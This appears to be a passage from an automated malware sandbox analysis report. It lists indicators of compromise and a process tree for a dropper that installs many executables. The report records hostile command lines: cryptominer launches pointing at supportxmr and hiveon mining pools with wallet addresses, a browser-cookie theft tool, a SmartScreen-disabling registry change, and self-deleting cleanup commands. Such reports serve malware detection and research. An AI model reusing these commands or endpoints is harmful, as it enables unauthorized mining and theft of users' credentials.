multitimer.exe Token: SeAuditPrivilege 2420 svchost.exe Token: SeAuditPrivilege 2420 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2684 svchost.exe Token: SeIncreaseQuotaPrivilege 2684 svchost.exe Token: SeSecurityPrivilege 2684 svchost.exe Token: SeTakeOwnershipPrivilege 2684 svchost.exe Token: SeLoadDriverPrivilege 2684 svchost.exe Token: SeSystemtimePrivilege 2684 svchost.exe Token: SeBackupPrivilege 2684 svchost.exe Token: SeRestorePrivilege 2684 svchost.exe Token: SeShutdownPrivilege 2684 svchost.exe Token: SeSystemEnvironmentPrivilege 2684 svchost.exe Token: SeUndockPrivilege 2684 svchost.exe Token: SeManageVolumePrivilege 2684 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2684 svchost.exe Token: SeIncreaseQuotaPrivilege 2684 svchost.exe Token: SeSecurityPrivilege 2684 svchost.exe Token: SeTakeOwnershipPrivilege 2684 svchost.exe Token: SeLoadDriverPrivilege 2684 svchost.exe Token: SeSystemtimePrivilege 2684 svchost.exe Token: SeBackupPrivilege 2684 svchost.exe Token: SeRestorePrivilege 2684 svchost.exe Token: SeShutdownPrivilege 2684 svchost.exe Token: SeSystemEnvironmentPrivilege 2684 svchost.exe Token: SeUndockPrivilege 2684 svchost.exe Token: SeManageVolumePrivilege 2684 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2684 svchost.exe Token: SeIncreaseQuotaPrivilege 2684 svchost.exe Token: SeSecurityPrivilege 2684 svchost.exe Token: SeTakeOwnershipPrivilege 2684 svchost.exe Token: SeLoadDriverPrivilege 2684 svchost.exe Token: SeSystemtimePrivilege 2684 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
prolab.tmpirecord.tmpSetup3310.tmpvpn.tmpnrl0jkg334t.exeIBInstaller_97039.tmpei111qo1fyj.tmpvict.tmppid process 4264 prolab.tmp 4392 irecord.tmp 5512 Setup3310.tmp 5704 vpn.tmp 1000 nrl0jkg334t.exe 6200 IBInstaller_97039.tmp 5236 ei111qo1fyj.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 1720 vict.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp 5704 vpn.tmp -
Suspicious use of SetWindowsHookEx 28 IoCs
Processes:
MicrosoftEdge.exe804C.exe8484.exesetups.exesetups.tmpMicrosoftEdge.execpyrix.exevict.exeSetup3310.exeSetup3310.tmpvict.tmpwin1host.exetaskkill.exeSetup.exeMaskVPNUpdate.exesetups.exesetups.tmpMicrosoftEdge.exeMicrosoftEdgeCP.execpyrix.exevict.exeSetup3310.exevict.tmpSetup3310.tmpwin1host.exepid process 2276 MicrosoftEdge.exe 5560 5560 4964 804C.exe 7928 8484.exe 7888 setups.exe 4628 setups.tmp 4756 MicrosoftEdge.exe 5144 cpyrix.exe 4792 vict.exe 6436 Setup3310.exe 6508 Setup3310.tmp 4676 vict.tmp 8156 win1host.exe 4700 taskkill.exe 5304 Setup.exe 4700 taskkill.exe 8412 MaskVPNUpdate.exe 6540 setups.exe 9068 setups.tmp 6984 MicrosoftEdge.exe 8856 MicrosoftEdgeCP.exe 8796 cpyrix.exe 8716 vict.exe 5872 Setup3310.exe 6404 vict.tmp 7276 Setup3310.tmp 6584 win1host.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
29DEA0BA258723098A514297F4C4D0B7.exeLabPicV3.exelylal220.exeguihuali-game.exelylal220.tmpLabPicV3.tmphjjgaa.exe22.exeWScript.exerundll32.exesvchost.exeThree.exedescription pid process target process PID 1152 wrote to memory of 2736 1152 29DEA0BA258723098A514297F4C4D0B7.exe hjjgaa.exe PID 1152 wrote to memory of 2736 1152 29DEA0BA258723098A514297F4C4D0B7.exe hjjgaa.exe PID 1152 wrote to memory of 2736 1152 29DEA0BA258723098A514297F4C4D0B7.exe hjjgaa.exe PID 1152 wrote to memory of 508 1152 29DEA0BA258723098A514297F4C4D0B7.exe RunWW.exe PID 1152 wrote to memory of 508 1152 29DEA0BA258723098A514297F4C4D0B7.exe RunWW.exe PID 1152 wrote to memory of 508 1152 29DEA0BA258723098A514297F4C4D0B7.exe RunWW.exe PID 1152 wrote to memory of 3836 1152 29DEA0BA258723098A514297F4C4D0B7.exe jg7_7wjg.exe PID 1152 wrote to memory of 3836 1152 29DEA0BA258723098A514297F4C4D0B7.exe jg7_7wjg.exe PID 1152 wrote to memory of 3836 1152 29DEA0BA258723098A514297F4C4D0B7.exe jg7_7wjg.exe PID 1152 wrote to memory of 3096 1152 29DEA0BA258723098A514297F4C4D0B7.exe LabPicV3.exe PID 1152 wrote to memory of 3096 1152 29DEA0BA258723098A514297F4C4D0B7.exe LabPicV3.exe PID 1152 wrote to memory of 3096 1152 29DEA0BA258723098A514297F4C4D0B7.exe LabPicV3.exe PID 1152 wrote to memory of 696 1152 29DEA0BA258723098A514297F4C4D0B7.exe lylal220.exe PID 1152 wrote to memory of 696 1152 29DEA0BA258723098A514297F4C4D0B7.exe lylal220.exe PID 1152 wrote to memory of 696 1152 29DEA0BA258723098A514297F4C4D0B7.exe lylal220.exe PID 1152 wrote to memory of 2640 1152 29DEA0BA258723098A514297F4C4D0B7.exe 22.exe PID 1152 wrote to memory of 2640 1152 29DEA0BA258723098A514297F4C4D0B7.exe 22.exe PID 1152 wrote to memory of 2640 1152 29DEA0BA258723098A514297F4C4D0B7.exe 22.exe PID 1152 wrote to memory of 184 1152 29DEA0BA258723098A514297F4C4D0B7.exe guihuali-game.exe PID 1152 wrote to memory of 184 1152 29DEA0BA258723098A514297F4C4D0B7.exe guihuali-game.exe PID 1152 wrote to memory of 184 1152 29DEA0BA258723098A514297F4C4D0B7.exe guihuali-game.exe PID 1152 wrote to memory of 2976 1152 29DEA0BA258723098A514297F4C4D0B7.exe HookSetp.exe PID 1152 wrote to memory of 2976 1152 29DEA0BA258723098A514297F4C4D0B7.exe HookSetp.exe PID 1152 wrote to memory of 3200 1152 29DEA0BA258723098A514297F4C4D0B7.exe Three.exe PID 1152 wrote to memory of 3200 1152 29DEA0BA258723098A514297F4C4D0B7.exe Three.exe PID 3096 wrote to memory of 1292 3096 LabPicV3.exe LabPicV3.tmp PID 3096 wrote to memory of 1292 3096 LabPicV3.exe LabPicV3.tmp PID 3096 wrote to memory of 1292 3096 LabPicV3.exe LabPicV3.tmp PID 1152 wrote to memory of 2648 1152 29DEA0BA258723098A514297F4C4D0B7.exe lilalmix.exe PID 1152 wrote to memory of 2648 1152 29DEA0BA258723098A514297F4C4D0B7.exe lilalmix.exe PID 1152 wrote to memory of 2648 1152 29DEA0BA258723098A514297F4C4D0B7.exe lilalmix.exe PID 696 wrote to memory of 804 696 lylal220.exe lylal220.tmp PID 696 wrote to memory of 804 696 lylal220.exe lylal220.tmp PID 696 wrote to memory of 804 696 lylal220.exe lylal220.tmp PID 1152 wrote to memory of 740 1152 29DEA0BA258723098A514297F4C4D0B7.exe loli.exe PID 1152 wrote to memory of 740 1152 29DEA0BA258723098A514297F4C4D0B7.exe loli.exe PID 1152 wrote to memory of 740 1152 29DEA0BA258723098A514297F4C4D0B7.exe loli.exe PID 184 wrote to memory of 4148 184 guihuali-game.exe WScript.exe PID 184 wrote to memory of 4148 184 guihuali-game.exe WScript.exe PID 184 wrote to memory of 4148 184 guihuali-game.exe WScript.exe PID 804 wrote to memory of 4220 804 lylal220.tmp Microsoft.exe PID 804 wrote to memory of 4220 804 lylal220.tmp Microsoft.exe PID 1292 wrote to memory of 4248 1292 LabPicV3.tmp ppppppfy.exe PID 1292 wrote to memory of 4248 1292 LabPicV3.tmp ppppppfy.exe PID 2736 wrote to memory of 4388 2736 hjjgaa.exe jfiag3g_gg.exe PID 2736 wrote to memory of 4388 2736 hjjgaa.exe jfiag3g_gg.exe PID 2736 wrote to memory of 4388 2736 hjjgaa.exe jfiag3g_gg.exe PID 2640 wrote to memory of 4516 2640 22.exe WScript.exe PID 2640 wrote to memory of 4516 2640 22.exe WScript.exe PID 2640 wrote to memory of 4516 2640 22.exe WScript.exe PID 4148 wrote to memory of 4672 4148 WScript.exe rundll32.exe PID 4148 wrote to memory of 4672 4148 WScript.exe rundll32.exe PID 4148 wrote to memory of 4672 4148 WScript.exe rundll32.exe PID 4672 wrote to memory of 3632 4672 rundll32.exe svchost.exe PID 3632 wrote to memory of 4780 3632 svchost.exe svchost.exe PID 3632 wrote to memory of 4780 3632 svchost.exe svchost.exe PID 4672 wrote to memory of 2592 4672 rundll32.exe svchost.exe PID 3632 wrote to memory of 4780 3632 svchost.exe svchost.exe PID 4672 wrote to memory of 60 4672 rundll32.exe svchost.exe PID 4672 wrote to memory of 2388 4672 rundll32.exe svchost.exe PID 3200 wrote to memory of 4928 3200 Three.exe multitimer.exe PID 3200 wrote to memory of 4928 3200 Three.exe multitimer.exe PID 4672 wrote to memory of 2420 4672 rundll32.exe svchost.exe PID 3200 wrote to memory of 5020 3200 Three.exe setups.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
lilalmix.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSmartScreen = "0" lilalmix.exe -
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 6712 attrib.exe 7272 attrib.exe 4888 attrib.exe 6468 attrib.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\iccbrhtC:\Users\Admin\AppData\Roaming\iccbrht2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\29DEA0BA258723098A514297F4C4D0B7.exe"C:\Users\Admin\AppData\Local\Temp\29DEA0BA258723098A514297F4C4D0B7.exe"1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 9483⤵
- Program crash
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 9323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 10843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 11323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 11803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 12803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 13283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 14243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1243⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-1UEL3.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-1UEL3.tmp\LabPicV3.tmp" /SL5="$1020A,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-NP6IU.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-NP6IU.tmp\ppppppfy.exe" /S /UID=lab2144⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\MLDIETHYOD\prolab.exe"C:\Program Files\Google\MLDIETHYOD\prolab.exe" /VERYSILENT5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-OQ75A.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-OQ75A.tmp\prolab.tmp" /SL5="$80050,575243,216576,C:\Program Files\Google\MLDIETHYOD\prolab.exe" /VERYSILENT6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\93-003f0-9f3-969b7-e49350366d6a2\Fuwivodaepi.exe"C:\Users\Admin\AppData\Local\Temp\93-003f0-9f3-969b7-e49350366d6a2\Fuwivodaepi.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\57-212c3-aee-e13bf-a1a1ee95cb682\Getupycore.exe"C:\Users\Admin\AppData\Local\Temp\57-212c3-aee-e13bf-a1a1ee95cb682\Getupycore.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ft05tdz2.tox\md6_6ydj.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\ft05tdz2.tox\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\ft05tdz2.tox\md6_6ydj.exe7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fxc2pdp2.cp0\askinstall31.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\fxc2pdp2.cp0\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\fxc2pdp2.cp0\askinstall31.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe9⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xsyy4ifr.pm4\toolspab1.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\xsyy4ifr.pm4\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\xsyy4ifr.pm4\toolspab1.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\xsyy4ifr.pm4\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\xsyy4ifr.pm4\toolspab1.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lt5ghxyh.5qy\GcleanerWW.exe /mixone & exit6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d0ujfwle.bnq\setup_10.2_mix.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\d0ujfwle.bnq\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\d0ujfwle.bnq\setup_10.2_mix.exe7⤵
- Drops file in Program Files directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b0i3llui.auq\file.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\b0i3llui.auq\file.exeC:\Users\Admin\AppData\Local\Temp\b0i3llui.auq\file.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\X2NSOCC3B4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\X2NSOCC3B4\multitimer.exe" 0 3060197d33d91c80.94013368 0 1019⤵
-
C:\Users\Admin\AppData\Local\Temp\X2NSOCC3B4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\X2NSOCC3B4\multitimer.exe" 1 3.1617574122.606a38eaa4b7a 10110⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\X2NSOCC3B4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\X2NSOCC3B4\multitimer.exe" 2 3.1617574122.606a38eaa4b7a11⤵
- Checks for any installed AV software in registry
-
C:\Users\Admin\AppData\Local\Temp\101wqmsb33i\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\101wqmsb33i\cpyrix.exe" /VERYSILENT12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe13⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"14⤵
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"14⤵
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"14⤵
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe13⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"14⤵
-
C:\Users\Admin\AppData\Local\Temp\pptxykgakcb\vict.exe"C:\Users\Admin\AppData\Local\Temp\pptxykgakcb\vict.exe" /VERYSILENT /id=53512⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-7CK48.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-7CK48.tmp\vict.tmp" /SL5="$70174,870426,780800,C:\Users\Admin\AppData\Local\Temp\pptxykgakcb\vict.exe" /VERYSILENT /id=53513⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-IL6KA.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-IL6KA.tmp\win1host.exe" 53514⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\gnnvvtzkv4t\app.exe"C:\Users\Admin\AppData\Local\Temp\gnnvvtzkv4t\app.exe" /8-2312⤵
-
C:\Users\Admin\AppData\Local\Temp\gnnvvtzkv4t\app.exe"C:\Users\Admin\AppData\Local\Temp\gnnvvtzkv4t\app.exe" /8-2313⤵
-
C:\Users\Admin\AppData\Local\Temp\dy5nhpkfyjx\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\dy5nhpkfyjx\Setup3310.exe" /Verysilent /subid=57712⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-219OV.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-219OV.tmp\Setup3310.tmp" /SL5="$5039A,138429,56832,C:\Users\Admin\AppData\Local\Temp\dy5nhpkfyjx\Setup3310.exe" /Verysilent /subid=57713⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-6BSA7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-6BSA7.tmp\Setup.exe" /Verysilent14⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\tq4ocojcarw\qxzp3bsfdch.exe"C:\Users\Admin\AppData\Local\Temp\tq4ocojcarw\qxzp3bsfdch.exe" /ustwo INSTALL12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "qxzp3bsfdch.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\tq4ocojcarw\qxzp3bsfdch.exe" & exit13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "qxzp3bsfdch.exe" /f14⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\7SJJ9EQMVC\setups.exe"C:\Users\Admin\AppData\Local\Temp\7SJJ9EQMVC\setups.exe" ll9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-MEGAD.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-MEGAD.tmp\setups.tmp" /SL5="$705A0,454998,229376,C:\Users\Admin\AppData\Local\Temp\7SJJ9EQMVC\setups.exe" ll10⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Full Program Features.exe"8⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"9⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"8⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Roaming\F1C3.tmp.exe"C:\Users\Admin\AppData\Roaming\F1C3.tmp.exe"9⤵
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w15930 --cpu-max-threads-hint 50 -r 999910⤵
- Blocklisted process makes network request
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w1573@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999910⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\Users\Admin\AppData\Roaming\FD8C.tmp.exe"C:\Users\Admin\AppData\Roaming\FD8C.tmp.exe"9⤵
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\FD8C.tmp.exe10⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 311⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"9⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.110⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt9⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v5slvl3y.na5\app.exe /8-2222 & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\v5slvl3y.na5\app.exeC:\Users\Admin\AppData\Local\Temp\v5slvl3y.na5\app.exe /8-22227⤵
-
C:\Users\Admin\AppData\Local\Temp\v5slvl3y.na5\app.exe"C:\Users\Admin\AppData\Local\Temp\v5slvl3y.na5\app.exe" /8-22228⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vv2zmfke.rmk\Four.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\vv2zmfke.rmk\Four.exeC:\Users\Admin\AppData\Local\Temp\vv2zmfke.rmk\Four.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\6GMXAJKZY0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\6GMXAJKZY0\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1048⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\6GMXAJKZY0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\6GMXAJKZY0\multitimer.exe" 1 3.1617574195.606a3933ba78a 1049⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\6GMXAJKZY0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\6GMXAJKZY0\multitimer.exe" 2 3.1617574195.606a3933ba78a10⤵
- Checks for any installed AV software in registry
-
C:\Users\Admin\AppData\Local\Temp\my2agerx3gz\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\my2agerx3gz\Setup3310.exe" /Verysilent /subid=57711⤵
-
